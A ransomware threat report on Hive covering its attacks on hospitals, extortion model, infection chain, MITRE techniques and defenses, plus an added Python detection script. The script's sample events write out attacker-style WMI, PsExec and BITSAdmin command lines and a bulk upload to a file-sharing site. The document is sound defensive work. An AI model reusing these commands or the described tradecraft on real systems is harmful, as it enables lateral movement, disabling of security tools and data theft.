# Ransomware Spotlight: Hive

trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive

By Trend Micro Research

Hive ransomware is one of the new ransomware families in 2021 that poses significant challenges to enterprises worldwide. We take an in-depth look at the ransomware group’s operations and discuss how organizations can bolster their defenses against it.

While some [ransomware](https://www.trendmicro.com/vinfo/us/security/definition/ransomware) groups operating as ransomware-as-a-service (RaaS) networks claim to steer clear of targeting specific sectors such as hospitals or other critical industries to avoid causing harm to people, Hive’s attacks against healthcare providers in 2021 showed that the operators behind it have no regard for such humanitarian considerations. [A hospital in Missouri suffered a Hive ransomware attack](https://healthitsecurity.com/news/hive-ransomware-continues-to-attack-healthcare-providers#:~:text=Hive%20Ransomware%20Group%20Attacks%20Missouri,Louis%20Public%20Radio%20reported.) three weeks after the same group [hit the integrated systems of a healthcare provider](https://www.bleepingcomputer.com/news/security/hive-ransomware-attacks-memorial-health-system-steals-patient-data/), an attack that affected three hospitals and many outpatient clinics in two other US states. Hive ransomware has become [one of the most active ransomware families since its discovery in June 2021](https://www.bleepingcomputer.com/news/security/hive-ransomware-attacks-memorial-health-system-steals-patient-data/). To defend against this threat, it is therefore crucial for companies to be acquainted with the various mechanisms that the infamous ransomware gang uses.

## What do organizations need to know about Hive?
On August 15, 2021, [Hive’s ransomware attacks against a non-profit integrated health system](https://www.bleepingcomputer.com/news/security/hive-ransomware-attacks-memorial-health-system-steals-patient-data/) severely disrupted the clinical and financial operations of three hospitals in Ohio and West Virginia. The attack resulted in emergency room diversions and the cancelation of urgent surgical cases and radiology examinations. The encryption of files forced hospital staff to use paper charts. Aside from the three hospitals, the affected non-profit also runs several outpatient service sites and clinics with a combined workforce of 3,000 employees.

Hive operators used [double extortion](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti) techniques in this attack. Aside from encrypting data, they also stole patient information that they threatened to publish on HiveLeaks, their dedicated leak site. The gang shares the list of victims that have not paid the ransom on their Tor site.

The incident prompted the FBI to issue [an alert in late August](https://www.documentcloud.org/documents/21049431-fbi-flash-hive-ransomware-iocs) that detailed Hive ransomware’s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs). According to the alert, Hive operators use phishing emails with malicious attachments to gain initial access to the system and Remote Desktop Protocol (RDP) to move laterally once on the network.

The drive of those in the cyber-underground to expand their foothold inevitably leads them down new paths. In late October 2021, threat researchers discovered that Hive has new malware tools specifically developed to encrypt Linux and FreeBSD systems. The [report](https://www.bleepingcomputer.com/news/security/hive-ransomware-now-encrypts-linux-and-freebsd-systems/) notes that Hive is among the ransomware operators that have set their sights on Linux servers; other notorious ransomware groups have also been known to create their own Linux encryptors. As enterprises migrate to virtual machines to achieve better device management and optimize the use of resources, targeting virtual machines also makes good business sense for RaaS operators, because it enables them to encrypt multiple servers simultaneously with just one command. Researchers pointed out that Hive’s bespoke tool for Linux is not yet fully functional, as it still cannot completely encrypt all files when the malware is deployed in an explicit path. However, one can expect Hive to keep refining its Linux encryptors to diversify and fortify its malware tool kit.

In January, [one of Europe’s largest car dealers suffered a ransomware attack](https://www.zdnet.com/article/europes-biggest-car-dealer-hit-with-ransomware-attack/). The Swiss company’s name appeared as one of the victims on HiveLeaks in February. Targeting high-value enterprises has become a trend for ransomware operators, as can be gleaned from the profile of this victim, which reportedly generated US$3.29 billion in revenues for 2020.

## Overview of Hive’s operations

Hive operations are more prolific than their leak site might suggest. HiveLeaks only publishes the list of victims that have not settled the ransom, so it is tough to determine which — or how many — companies decided to pay. [A report indicates](https://www.bleepingcomputer.com/news/security/hive-ransomware-enters-big-league-with-hundreds-breached-in-four-months/) that attack attempts by Hive affiliates hit an average of three companies per day since the group was first discovered in June 2021.
The report also mentioned that security researchers who obtained information directly from the administrator panel of the Hive Tor site discovered that the number of enterprises whose systems had been compromised had reached 355 from September to December 2021. [Intelligence gathered by the researchers](https://www.bleepingcomputer.com/news/security/hive-ransomware-enters-big-league-with-hundreds-breached-in-four-months/) further revealed that the founders of the group deliberately put systems in place to achieve as much ease and transparency as possible, particularly in the process of ransomware deployment and negotiations. Researchers also learned that affiliates can generate malware versions within 15 minutes, while negotiations are routed through the Hive ransomware administrators, who relay the messages to the victims in a chat window that the affiliates can see. Researchers also shared that affiliates can see on the Hive administrator panel how much money was collected, the list of companies that paid, and those whose information was leaked.

The group’s emphasis on operational efficiency and transparency is key to enticing new affiliates. It suggests that the group is aiming for sustainability by creating an environment that is conducive to building a bigger and stronger affiliate base.

Of note is that [some enterprises complained about the decryption tool](https://www.bleepingcomputer.com/news/security/hive-ransomware-enters-big-league-with-hundreds-breached-in-four-months/) that Hive operators provided after the ransom was settled. Reports said it lacked proper functionality and claimed that the Master Boot Records of their virtual machines were corrupted, rendering them incapable of booting.

## Top affected countries and industries

This section cites Trend Micro™ Smart Protection Network™ (SPN) data on Hive’s attempts to compromise organizations.
Our detections show that Hive ransomware attack attempts against organizations were observed the most in South America, with Argentina receiving the highest number, followed by Brazil. The United States takes the third spot, while the rest are spread across Europe, Asia, and the Middle East.

Figure 1. 10 countries with the highest number of attack attempts per machine for Hive ransomware (August 1, 2021 to February 28, 2022)
_Source: Trend Micro Smart Protection Network_

The energy sector had the highest number of attack attempts at 186; healthcare came in second at 125, followed by the financial sector with 102 detections.

Figure 2. 10 industries with the highest number of attack attempts per machine for Hive ransomware (August 1, 2021 to February 28, 2022)
_Source: Trend Micro Smart Protection Network_

By breaking down the detections per month, our findings reveal that attack attempts peaked in November 2021 at 429. Hive operators were most active in the fourth quarter of 2021, as detections in December and October were the second and third highest numbers, respectively.

Figure 3. Monthly breakdown of detections per machine for Hive ransomware (August 1, 2021 to February 28, 2022)
_Source: Trend Micro Smart Protection Network_

## Targeted regions and sectors according to Hive’s leak site

An examination of the information that can be found on HiveLeaks reveals the number of successfully compromised companies that, as of this writing, have declined to pay the ransom. In our monitoring of their leak site from December 1, 2021 to February 28, 2022, attacks were highest in North America at 45.2%, followed by Europe at 29% and Latin America at 12.9%.

Figure 4. Regional distribution of Hive victims according to the group’s leak site (December 1, 2021 to February 28, 2022)

Enterprises appear to be Hive’s preferred targets, estimated at almost 40%. Their victims came from a wide range of sectors, with technology at the top of the list with a victim count of 5.
The healthcare and transportation sectors follow at 4 victims each. Other affected industries include construction, media and entertainment, professional services, retail, materials, automotive, and apparel and fashion.

Figure 5. Sector distribution of Hive victims according to the group’s leak site (December 1, 2021 to February 28, 2022)

Data observed in the same time frame showed that most of the attacks took place on weekdays, as malicious activity on weekends comprised only 6.5%.

## Infection chain and techniques

Figure 6. Infection chain of Hive ransomware

**Initial Access**

Hive operators breach systems through phishing emails with malicious attachments. We also observed Microsoft Exchange as a possible entry point for Hive ransomware, based on our detection of the same post-exploitation scripts found in the technique used to exploit [ProxyShell-related vulnerabilities](https://www.trendmicro.com/en_us/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html). These vulnerabilities were identified as CVE-2021-31207, [CVE-2021-34473](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473) and [CVE-2021-34523](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523).

**Execution**

Hive operators attempt to run the persistence technique for a [Cobalt Strike](https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html#:~:text=Cobalt%20Strike%20is%20a%20well,and%20remove%20a%20malware%20infection.) beacon, which can be used as a command-and-control (C&C) channel to accomplish lateral movement once they are inside the system.
Right after the attempt, Hive operators start to unload or uninstall antivirus (AV) products in the system so they can proceed to download and execute hacking tools such as [PCHunter](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PUA.Win64.PCHunter.A/), [GMER](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/pua.win32.gmer.a/), and [TrojanSpy.DATASPY](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojanspy.ps1.dataspy.a/). They use these tools to unload other AV products as a tactic to evade detection. We also observed [WMI](https://documents.trendmicro.com/assets/wp/wp-understanding-wmi-malware.pdf) being used to deploy uninstallation scripts and ransomware across the network for lateral movement.

**Defense Evasion, Discovery, and Credential Access**

We observed the presence of PCHunter and GMER as the tools used to discover and terminate services or processes in order to disable AV software. We also detected the use of TrojanSpy.DATASPY to gather information about the system, such as the machines in the network and the presence of specific AV products. In another attack, the threat actors deployed [KillAV](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.killav.wlde/) to terminate several AV products, also to avoid detection.

**Lateral Movement**

The Hive gang uses RDP and WMI to move laterally in the compromised network and deliver the payload remotely. We also detected the use of a [BITSAdmin command](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/microsoft-discovers-fileless-malware-campaign-dropping-astaroth-info-stealer) for lateral movement. The threat actors also used PsExec to move laterally within the network.

**Exfiltration**

Our detections showed that the Hive operators use the [7-Zip](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/major-security-flaws-found-in-7-zip) tool to archive stolen data for exfiltration. Moreover, the gang abuses anonymous file-sharing services such as MEGASync, AnonFiles, SendSpace, and uFile to exfiltrate data.

**Impact**

The ransomware payload proceeds with the encryption routine upon execution. The ransomware generates a random encryption key with the [RtlGenRandom API](https://docs.microsoft.com/en-us/windows/win32/api/ntsecapi/nf-ntsecapi-rtlgenrandom), which is initially held in the device’s memory. The key is then used in what appears to be a custom implementation of the encryption process. The key itself is encrypted with [RSA](https://www.britannica.com/topic/RSA-encryption) through [Go’s RSA implementation](https://golangdocs.com/rsa-encryption-decryption-in-golang), using a list of public keys embedded in the binary, and the result is saved as a .key file on the encrypted drive. The generated key is then wiped from memory, leaving the RSA-encrypted copy as the only form of the key available for decryption.
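The tool usage, remote-execution commands, and exfiltration destinations described in the infection chain above translate directly into endpoint and proxy detection logic. The script below is an added example written for this article; it is not Trend Micro’s code, nor anything recovered from Hive. It runs constructed Sysmon-style process-creation events and proxy records (hostnames, users, paths, and URLs are fictional) through rules for the behaviours named in the text, tags each hit with the ATT&CK IDs the article’s table uses (the exfiltration rule uses T1567.002, which the article’s table does not list), and escalates hosts that show more than one technique. The domain names for MEGA, AnonFiles, and SendSpace and the 50 MiB upload threshold are assumptions made for the example.

```python
"""Endpoint and proxy detection logic for the Hive tradecraft described above.

Hypothetical example written for this article (not Trend Micro or Hive code).
Rules follow the behaviours named in the text: AV-killer tools (PCHunter, GMER,
KillAV), WMI/PsExec/BITSAdmin remote execution and transfer, 7-Zip staging, and
uploads to the file-sharing services the article lists.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed telemetry: Sysmon-style process-creation events and proxy records.
# Hosts, users, paths and URLs are fictional and exist only for this example.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS01",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic /node:"SRV02" process call create "cmd /c \\FS01\share\uninst.bat"'},
    {"type": "process", "host": "WS01",
     "image": r"C:\Tools\PsExec.exe",
     "cmdline": r"PsExec.exe \\SRV02 -s cmd /c C:\ProgramData\run.bat"},
    {"type": "process", "host": "SRV02",
     "image": r"C:\Users\Public\PCHunter64.exe",
     "cmdline": r"PCHunter64.exe"},
    {"type": "process", "host": "SRV02",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 http://files.example.test/tool.bin C:\ProgramData\tool.bin"},
    {"type": "process", "host": "SRV02",
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a -mx9 C:\ProgramData\stage.7z D:\Finance\*"},
    {"type": "proxy", "host": "SRV02", "method": "PUT",
     "url": "https://ufile.io/upload", "bytes_out": 734_003_200},
    # Benign activity on another workstation that must not fire.
    {"type": "process", "host": "WS07",
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe x C:\Users\amy\Downloads\report.7z"},
    {"type": "proxy", "host": "WS07", "method": "GET",
     "url": "https://www.example.com/", "bytes_out": 512},
]

# (rule name, ATT&CK technique from the article's table, pattern matched against
# "image cmdline"). Case-insensitive because Windows paths are.
PROCESS_RULES = [
    ("AV-killer tool", "T1562.001", re.compile(r"pchunter|gmer|killav", re.I)),
    ("WMI remote process creation", "T1047",
     re.compile(r"wmic(\.exe)?\s.*?/node:.*process\s+call\s+create", re.I)),
    ("PsExec remote execution", "T1021.002",
     re.compile(r"psexec(64)?(\.exe)?\s+\\\\", re.I)),
    ("BITSAdmin transfer job", "T1105",
     re.compile(r"bitsadmin(\.exe)?\s.*?/transfer", re.I)),
    ("7-Zip archive creation", "T1560.001",
     re.compile(r"7za?(\.exe)?\s+a\s", re.I)),
]

# Services the article names as abused for exfiltration. The domain forms are
# assumptions for this example; T1567.002 is not in the article's table.
EXFIL_DOMAINS = ("mega.nz", "anonfiles.com", "sendspace.com", "ufile.io")
UPLOAD_METHODS = {"PUT", "POST"}
EXFIL_MIN_BYTES = 50 * 1024 * 1024  # constructed threshold: 50 MiB outbound


def _is_exfil_destination(url):
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in EXFIL_DOMAINS)


def detect(events):
    """Return {host: [(rule, technique, evidence), ...]} for every rule hit."""
    findings = defaultdict(list)
    for ev in events:
        if ev["type"] == "process":
            text = f'{ev["image"]} {ev["cmdline"]}'
            for rule, technique, pattern in PROCESS_RULES:
                if pattern.search(text):
                    findings[ev["host"]].append((rule, technique, ev["cmdline"]))
        elif ev["type"] == "proxy":
            if (ev["method"] in UPLOAD_METHODS
                    and ev["bytes_out"] >= EXFIL_MIN_BYTES
                    and _is_exfil_destination(ev["url"])):
                findings[ev["host"]].append(
                    ("Bulk upload to file-sharing service", "T1567.002", ev["url"]))
    return dict(findings)


def triage(findings, min_techniques=2):
    """Hosts showing several distinct techniques, sorted; these go to incident response first."""
    return sorted(host for host, hits in findings.items()
                  if len({technique for _, technique, _ in hits}) >= min_techniques)


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for host in triage(hits):
        print(host)
        for rule, technique, evidence in hits[host]:
            print(f"  [{technique}] {rule}: {evidence}")
```

Requiring at least two distinct techniques on a host before escalating is deliberate: 7-Zip, WMI, and PsExec all have legitimate administrative uses, and the article’s point is the combination of AV tampering, remote execution, archive staging, and bulk uploads on the same machine, not any single tool. On the constructed data, SRV02 (four techniques) and WS01 (two) are escalated while WS07, which only extracts an archive and browses, produces no findings.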
## MITRE tactics and techniques

| Tactic | Technique | Observed behavior |
|---|---|---|
| Initial Access | T1566.001 Phishing: Spearphishing Attachment | Arrives via phishing emails. |
| Initial Access | T1190 Exploit Public-Facing Application | Arrives via any of the following exploits: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207. |
| Initial Access | T1078 Valid Accounts | Has been reported to make use of compromised accounts to access victims via RDP. |
| Execution | T1106 Native API | Uses native API to execute various commands and routines. |
| Execution | T1059.003 Command and Scripting Interpreter: Windows Command Shell | The ransomware accepts various command-line arguments upon execution. |
| Execution | T1059.001 Command and Scripting Interpreter: PowerShell | Cobalt Strike executes a PowerShell command to run the persistence technique. |
| Execution | T1053.005 Scheduled Task/Job: Scheduled Task | Registers and executes malicious tasks. |
| Execution | T1204 User Execution | User execution is needed to run the payload from the spearphishing link or attachment. |
| Execution | T1047 Windows Management Instrumentation | Uses WMI to deploy uninstallation scripts and ransomware. |
| Persistence | T1053.005 Scheduled Task/Job: Scheduled Task | Scheduled task used for boot or logon autostart (labeled "Boot or logon autostart execution" in the original table). |
| Privilege Escalation | T1068 Exploitation for Privilege Escalation | Makes use of CVE-2021-34523 to escalate privileges. |
| Defense Evasion | T1562.001 Impair Defenses: Disable or Modify Tools | Uses several tools to disable security-related software by terminating it. |
| Discovery | T1083 File and Directory Discovery | Searches for specific files and directories related to its encryption. |
| Discovery | T1018 Remote System Discovery | Makes use of tools for network scans. |
| Discovery | T1057 Process Discovery | Discovers certain processes for process termination. |
| Discovery | T1063 Security Software Discovery | Discovers security software for reconnaissance and termination. |
| Discovery | T1049 System Network Connections Discovery | Uses TrojanSpy.DATASPY to gather information about the connected machines in the network. |
| Discovery | T1135 Network Share Discovery | Lists all available machines in the network via SMB. |
| Lateral Movement | T1570 Lateral Tool Transfer | Can make use of RDP to transfer the ransomware or tools within the network. |
| Lateral Movement | T1021.002 Remote Services: SMB/Windows Admin Shares | Uses RDP to transfer and execute the ransomware payload and other tools. |
| Lateral Movement | T1021.006 Remote Services: Windows Remote Management | Uses WMI to execute and deploy uninstallation scripts and the ransomware payload. |
| Collection | T1005 Data from Local System | May make use of RDP to manually search for valuable files or information. |
| Collection | T1560.001 Archive Collected Data: Archive via Utility | Uses a tool to archive stolen information for exfiltration. |
| Command and Control | T1105 Ingress Tool Transfer | Executes a BITSAdmin command to deliver the ransomware to other machines in the network. |

## Summary of malware, tools, and exploits used

Security teams can watch out for the presence of the following malware, tools, and exploits that are typically used in Hive attacks:

| Stage | Tool or exploit | Description |
|---|---|---|
| Initial Access | Phishing emails with malicious attachments | Lure and delivery vector used to breach systems. |
| Initial Access | CVE-2021-34473 | Pre-auth path confusion vulnerability to bypass access control. |
| Initial Access | CVE-2021-34523 | Privilege elevation vulnerability in the Exchange PowerShell backend. |
| Initial Access | CVE-2021-31207 | Post-auth remote code execution via arbitrary file write. |
| Execution | PsExec | Third-party tool to execute a process or command line on a remote computer. |
| Execution | WMI | Administration feature that provides a uniform environment to access Windows system components; used for remote execution of files for lateral movement. |
| Execution | Cobalt Strike | Beacon whose persistence technique the operators attempt to run after intrusion. |
| Discovery | TrojanSpy.DATASPY | Trojan that collects AV-related processes and services running in the system as well as connected machines within the network. |
| Lateral Movement | PsExec | Command-line utility built for Windows to allow programs to run on remote machines. |
| Lateral Movement | RDP | Used to spread across machines in the network over RDP connections. |
| Lateral Movement | BITSAdmin | Command-line tool used to create download or upload jobs and monitor their progress. |
| Lateral Movement | WMI | Administration feature that provides a uniform environment to access Windows system components; used for remote execution of files for lateral movement. |
| Defense Evasion | PCHunter | Third-party tool that can be used to disable security tools. |
| Defense Evasion | GMER | Third-party tool that can be used to disable security tools. |
| Defense Evasion | KillAV | Used to terminate AV processes. |
| Exfiltration | 7-Zip | File archiver with a high compression ratio. |
| Exfiltration | MEGASync | Third-party cloud storage tool abused for data exfiltration. |
| Exfiltration | uFile.io | Free file hosting website where people can upload and share files with other users; abused for data exfiltration. |
| Exfiltration | SendSpace | Third-party cloud storage tool abused for data exfiltration. |
| Exfiltration | AnonFiles | Online file storage provider that offers an anonymous working environment; abused for data exfiltration. |

## Recommendations

Despite being relatively new, Hive ransomware has already made its mark as one of the most prolific and aggressive ransomware families today. Our detections of their malicious activities show that their operations are robust, thus providing an incentive for new affiliates to join them. Hive operators are also known to constantly refine and diversify their TTPs, so it is important for companies to stay vigilant and be well-informed of potential threats. An organization stands a better chance of addressing ransomware threats if it implements strong defenses early on.
To protect systems against similar threats, organizations can establish security frameworks that allocate resources systematically for establishing a strong defense strategy against ransomware. Here are some best practices that organizations can consider:

**Audit and inventory**

- Take an inventory of assets and data
- Identify authorized and unauthorized devices and software
- Audit event and incident logs

**Configure and monitor**

- Manage hardware and software configurations
- Grant admin privileges and access only when necessary to an employee’s role
- Monitor network ports, protocols, and services
- Activate security configurations on network infrastructure devices such as firewalls and routers
- Establish a software allowlist that only executes legitimate applications

**Patch and update**

- Conduct regular vulnerability assessments
- Perform patching or virtual patching for operating systems and applications
- Update software and applications to their latest versions

**Protect and recover**

- Implement data protection, backup, and recovery measures
- Enable multifactor authentication (MFA)

**Secure and defend**

- Employ sandbox analysis to block malicious emails
- Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network
- Detect early signs of an attack such as the presence of suspicious tools in the system
- Use advanced detection technologies such as those powered by AI and machine learning

**Train and test**

- Regularly train and assess employees on security skills
- Conduct red-team exercises and penetration tests

A multilayered approach can help organizations guard possible entry points into their system (endpoint, email, web, and network). Security solutions can detect malicious components and suspicious behavior, which can help protect enterprises.
[Trend Micro Vision One™](https://www.trendmicro.com/en_us/business/products/detection-response.html) provides multilayered protection and behavior detection, which helps block questionable behavior and tools before the ransomware can do any damage.

[Trend Micro Cloud One™ Workload Security](https://www.trendmicro.com/en_us/business/products/hybrid-cloud/cloud-one-workload-security.html) protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning.

[Trend Micro™ Deep Discovery™ Email Inspector](https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/email-inspector.html) employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.

[Trend Micro Apex One™](https://www.trendmicro.com/en_us/business/products/user-protection/sps/endpoint.html) offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.

## Indicators of Compromise (IOCs)

The IOCs for this article can be found [here](https://documents.trendmicro.com/assets/txt/IOCs-Hive-ransomware-93DX2hv.txt). Actual indicators might vary per attack.